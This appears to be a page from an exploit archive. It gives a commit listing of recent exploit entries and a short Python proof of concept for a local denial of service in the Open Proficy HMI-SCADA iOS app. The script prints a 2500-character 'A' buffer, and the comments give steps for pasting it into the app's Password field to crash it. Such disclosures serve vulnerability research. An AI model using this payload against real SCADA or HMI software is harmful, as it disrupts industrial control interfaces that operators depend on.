3e9ff5a927
13 changes to exploits/shellcodes iSmartViewPro 1.3.34 - Denial of Service (PoC) Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC) Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path MobileGo 8.5.0 - Insecure File Permissions NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths nipper-ng 0.11.10 - Remote Buffer Overflow (PoC) Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal Crystal Live HTTP Server 6.01 - Directory Traversal Centova Cast 3.2.11 - Arbitrary File Download TemaTres 3.0 - Cross-Site Request Forgery (Add Admin) TemaTres 3.0 - 'value' Persistent Cross-site Scripting
28 lines
No EOL
883 B
Python
Executable file
28 lines
No EOL
883 B
Python
Executable file
# Exploit Title: Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)
|
|
# Discovery by: Luis Martinez
|
|
# Discovery Date: 2019-11-16
|
|
# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
|
|
# Software Link: App Store for iOS devices
|
|
# GE Intelligent Platforms, Inc.
|
|
# Tested Version: 5.0.0.25920
|
|
# Vulnerability Type: Denial of Service (DoS) Local
|
|
# Tested on OS: iPhone 7 iOS 13.2
|
|
|
|
# Steps to Produce the Crash:
|
|
# 1.- Run python code: Open_Proficy_HMI-SCADA_for_iOS_5.0.0.25920.py
|
|
# 2.- Copy content to clipboard
|
|
# 3.- Open "Open Proficy HMI-SCADA for iOS"
|
|
# 4.- Host List > "+"
|
|
# 5.- Add Host
|
|
# 6.- Address Type "IP Address"
|
|
# 7.- Host IP Address "192.168.1.1"
|
|
# 8.- User Name "l4m5"
|
|
# 9.- Paste ClipBoard on "Password"
|
|
# 10.- Add
|
|
# 11.- Connect
|
|
# 12.- Crashed
|
|
|
|
#!/usr/bin/env python
|
|
|
|
buffer = "\x41" * 2500
|
|
print (buffer) |